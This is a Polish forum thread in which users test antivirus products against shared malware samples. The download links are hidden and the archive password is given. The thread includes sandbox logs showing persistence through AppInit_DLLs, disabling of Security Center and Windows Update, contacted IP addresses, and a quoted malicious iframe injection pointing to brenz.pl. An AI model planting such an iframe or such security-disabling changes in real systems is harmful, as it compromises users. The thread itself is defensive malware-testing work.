Trojan.Mods.1 lub jak kto woli Trojan.RedirectENT.140
Nawiązujący do tematu:
[Aby zobaczyć linki, zarejestruj się tutaj]
[malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Kod:
[<HKLM> \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows] "LoadAppInit_DLLs ''= ''00000001''
[<HKLM> \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows] "AppInit_DLLs ''=''% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ bwlnzvl.dll"
Tworzy lub modyfikuje następujące pliki:
% Windir% \ Tasks \ gduivwf.job
Szkodliwe funkcje:
Tworzy i wykonuje następujące czynności:
''% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ sklfxjg.exe "Data \ Mozilla \ sklfxjg.exe-jytqpci
Modyfikacja systemu plików:
Tworzy następujące pliki:
% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ bwlnzvl.dll
% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ sklfxjg.exe
tomatto007 napisał(a): 2013-05-16-tomatto007.7z
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
pw=sg[/malware]
Avira Free-418/603=69,32%
tachion napisał(a): Trojan.Mods.1 lub jak kto woli Trojan.RedirectENT.140
[Aby zobaczyć linki, zarejestruj się tutaj]
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Kod:
[<HKLM> \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows] "LoadAppInit_DLLs ''= ''00000001''
[<HKLM> \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows] "AppInit_DLLs ''=''% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ bwlnzvl.dll"
Tworzy lub modyfikuje następujące pliki:
% Windir% \ Tasks \ gduivwf.job
Szkodliwe funkcje:
Tworzy i wykonuje następujące czynności:
''% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ sklfxjg.exe "Data \ Mozilla \ sklfxjg.exe-jytqpci
Modyfikacja systemu plików:
Tworzy następujące pliki:
% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ bwlnzvl.dll
% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ sklfxjg.exe
Avira Free-TR/Drop.Gepys.A.31
tachion napisał(a): Trojan.Mods.1 lub jak kto woli Trojan.RedirectENT.140
Nawiązujący do tematu:
[Aby zobaczyć linki, zarejestruj się tutaj]
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Kod:
[<HKLM> \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows] "LoadAppInit_DLLs ''= ''00000001''
[<HKLM> \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows] "AppInit_DLLs ''=''% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ bwlnzvl.dll"
Tworzy lub modyfikuje następujące pliki:
% Windir% \ Tasks \ gduivwf.job
Szkodliwe funkcje:
Tworzy i wykonuje następujące czynności:
''% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ sklfxjg.exe "Data \ Mozilla \ sklfxjg.exe-jytqpci
Modyfikacja systemu plików:
Tworzy następujące pliki:
% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ bwlnzvl.dll
% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ sklfxjg.exe
[Aby zobaczyć linki, zarejestruj się tutaj]
tachion napisał(a): Trojan.Mods.1 lub jak kto woli Trojan.RedirectENT.140
Nawiązujący do tematu:
[Aby zobaczyć linki, zarejestruj się tutaj]
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Kod:
[<HKLM> \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows] "LoadAppInit_DLLs ''= ''00000001''
[<HKLM> \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Windows] "AppInit_DLLs ''=''% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ bwlnzvl.dll"
Tworzy lub modyfikuje następujące pliki:
% Windir% \ Tasks \ gduivwf.job
Szkodliwe funkcje:
Tworzy i wykonuje następujące czynności:
''% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ sklfxjg.exe "Data \ Mozilla \ sklfxjg.exe-jytqpci
Modyfikacja systemu plików:
Tworzy następujące pliki:
% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ bwlnzvl.dll
% ALLUSERSPROFILE% \ Dane aplikacji \ Mozilla \ sklfxjg.exe
Arcavir 2013 - trojan.shipUP.utr
:O
NEW: Trojan.Beebone.D / Worm.Win32.Vobfus.dvmg
[malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
Pass: sg[/malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
fresh, now analyze
. wrrrr ... angry. Do not steal samples.!
Fakeav_System Care Antivirus
należący do rodziny
WinWebSec
[malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
Kod:
Defined file type created: C:\ProgramData\3868341E525B886100003867FBBF919C\3868341E525B886100003867FBBF919C.exe\0b0a6e1fd95da6f03a650dfb889cbc62.exe
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\luafv\Start = 00000004
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\wuauserv\Start = 00000004
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RunOnce\3868341E525B886100003867
Security Center settings change: machine\software\microsoft\security center\antivirusdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\antivirusoverride = 00000001
Security Center settings change: machine\software\microsoft\security center\firewalldisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\firewalloverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\antivirusdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\antivirusoverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\firewalldisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\firewalloverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\updatesdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\updatesdisablenotify = 00000001
Slept over 2 minutes
System Restore change: machine\software\microsoft\windows nt\currentversion\systemrestore\rpsessioninterval = empty value key
Internet connection: C:\Users\tachion\Desktop\0b0a6e1fd95da6f03a650dfb889cbc62.exe Connects to "175.41.29.181" on port 80 (TCP - HTTP)
tachion napisał(a): Fakeav_System Care Antivirus
należący do rodziny WinWebSec
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
Kod:
Defined file type created: C:\ProgramData\3868341E525B886100003867FBBF919C\3868341E525B886100003867FBBF919C.exe\0b0a6e1fd95da6f03a650dfb889cbc62.exe
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\luafv\Start = 00000004
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\wuauserv\Start = 00000004
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RunOnce\3868341E525B886100003867
Security Center settings change: machine\software\microsoft\security center\antivirusdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\antivirusoverride = 00000001
Security Center settings change: machine\software\microsoft\security center\firewalldisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\firewalloverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\antivirusdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\antivirusoverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\firewalldisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\firewalloverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\updatesdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\updatesdisablenotify = 00000001
Slept over 2 minutes
System Restore change: machine\software\microsoft\windows nt\currentversion\systemrestore\rpsessioninterval = empty value key
Internet connection: C:\Users\tachion\Desktop\0b0a6e1fd95da6f03a650dfb889cbc62.exe Connects to "175.41.29.181" on port 80 (TCP - HTTP)
[Aby zobaczyć linki, zarejestruj się tutaj]
tachion napisał(a): Fakeav_System Care Antivirus
należący do rodziny WinWebSec
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
Kod:
Defined file type created: C:\ProgramData\3868341E525B886100003867FBBF919C\3868341E525B886100003867FBBF919C.exe\0b0a6e1fd95da6f03a650dfb889cbc62.exe
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\luafv\Start = 00000004
Defined registry AutoStart location created or modified: machine\System\CurrentControlSet\Services\wuauserv\Start = 00000004
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RunOnce\3868341E525B886100003867
Security Center settings change: machine\software\microsoft\security center\antivirusdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\antivirusoverride = 00000001
Security Center settings change: machine\software\microsoft\security center\firewalldisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\firewalloverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\antivirusdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\antivirusoverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\firewalldisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\firewalloverride = 00000001
Security Center settings change: machine\software\microsoft\security center\svc\updatesdisablenotify = 00000001
Security Center settings change: machine\software\microsoft\security center\updatesdisablenotify = 00000001
Slept over 2 minutes
System Restore change: machine\software\microsoft\windows nt\currentversion\systemrestore\rpsessioninterval = empty value key
Internet connection: C:\Users\tachion\Desktop\0b0a6e1fd95da6f03a650dfb889cbc62.exe Connects to "175.41.29.181" on port 80 (TCP - HTTP)
Rising-0/3 -wysłane do labu
Arcavir 0/3 - nie chce mi sie wysyłać tak szczerze
tachion napisał(a): Fakeav_System Care Antivirus
należący do rodziny WinWebSec
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Symantec Endpoint Protection 12.1
wszystkie 3 po uruchomieniu SONAR.RogueAV!gen1
Fake Twiter
[malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
pass:sg[/malware]
ArcaVir - Heur win32
Rising-0/1 wysłane do labu
Conor29134 napisał(a): Fake Twiter
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
pass:sg[/malware]
KIS 2013:
- wykrywa i usuwa po odpaleniu ---->
PDM:Trojan.Win32.StartPage.a
Anonymous Network napisał(a):NOWOŚĆ: Trojan.Beebone.D / Worm.Win32.Vobfus.dvmg
No wygląda na
Win32/Vobfus ,zmienia atrybuty plików,kopiuje nazwy plików które są na dysku i o takich samych nazwach się replikuje,infekuje również dyski przenośne.
Kod:
Created process: C:\Users\tachion\fofof.exe, "C:\Users\tachion\fofof.exe" , C:\Users\tachion\Downloads\12 sales summary
Created process: C:\Users\tachion\kkcaar.exe, "C:\Users\tachion\kkcaar.exe" , C:\Users\tachion\Downloads\12 sales summary
Created process: C:\Users\tachion\runme.exe, "C:\Users\tachion\runme.exe" , C:\Users\tachion\Downloads\12 sales summary
Defined Autostart file created: I:\autorun.inf
Defined file type created: C:\Users\tachion\fofof.exe
Defined file type created: C:\Users\tachion\kkcaar.exe
Defined file type created: C:\Users\tachion\runme.exe
File copied itself
Got input locale identifiers
Got system default language ID
Got user name information
Got volume information
Hid file from user: C:\Users\tachion\kkcaar.exe
Hid file from user: I:\autorun.inf
Hid file from user: I:\kkcaar.exe
Internet connection: C:\Sandbox\tachion\DefaultBox\user\current\fofof.exe Connects to "60.173.9.6" on port 2323 (TCP)
Internet connection: C:\Users\tachion\Downloads\12 sales summary\12 sales summary.exe Connects to "111.73.46.133" on port 2323 (TCP)
Microsoft Windows Update change: machine\software\policies\microsoft\windows\windowsupdate\au\noautoupdate = 00000001
Queried DNS: 18243.z0dns.com
[malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Szkodliwy adres
[malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
brenz.pl[/malware]
rising ładnie blokuje jako exploit strona zhackowana po zablokowaniu chromium informuje że szkodliwa strona
tachion napisał(a): Trojan.Mods.1 lub jak kto woli Trojan.RedirectENT.140
Nawiązujący do tematu:
[Aby zobaczyć linki, zarejestruj się tutaj]
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Avast wykrywa
Dodano: 16 maja 2013, 22:11
Anonymous Network napisał(a): NEW: Trojan.Beebone.D / Worm.Win32.Vobfus.dvmg
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
Pass: sg[/malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
Avast nie wykrywa
Dodano: 16 maja 2013, 22:13
tachion napisał(a): Fakeav_System Care Antivirus
należący do rodziny WinWebSec
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
[/malware]
Avast - 0/3
Dodano: 16 maja 2013, 22:15
Conor29134 napisał(a): Fake Twiter
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
pass:sg[/malware]
Avast nie wykrywa
Dodano: 16 maja 2013, 22:21
HTML:Iframe-ZG [Trj]
[malware]
[Aby zobaczyć linki, zarejestruj się tutaj]
>{gzip}[/malware]
Conor29134 napisał(a):Adres Szkodliwy
The socket connection to
[Aby zobaczyć linki, zarejestruj się tutaj]
failed. (148.81.111.111:80 )
ErrorCode: 10060.
Był kiedyś na tej stronie iframe który przekierowywał na inne stony.
Wszystkie strony zakażone posiadały taki iframe
<iframe style="height:1px" src="http://www.Brenz.pl/rc/” frameborder=0 wid..
Twoja stara napisał(a):
Dodano: 16 maja 2013, 22:21
HTML:Iframe-ZG [Trj]
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
>{gzip}[/malware]
Nic mi nie pobiera sie ani nie ładują skrypty javy
tachion a potrafisz zanalizować wtyczki do chroma ? ponieważ w tym "tweeterze" jest dodatek adobe.crx
Conor29134 napisał(a):Szkodliwy adres
[malware] [Aby zobaczyć linki, zarejestruj się tutaj]
brenz.pl[/malware]
rising ładnie blokuje jako exploit strona zhackowana po zablokowaniu chromium informuje że szkodliwa strona
[Aby zobaczyć linki, zarejestruj się tutaj]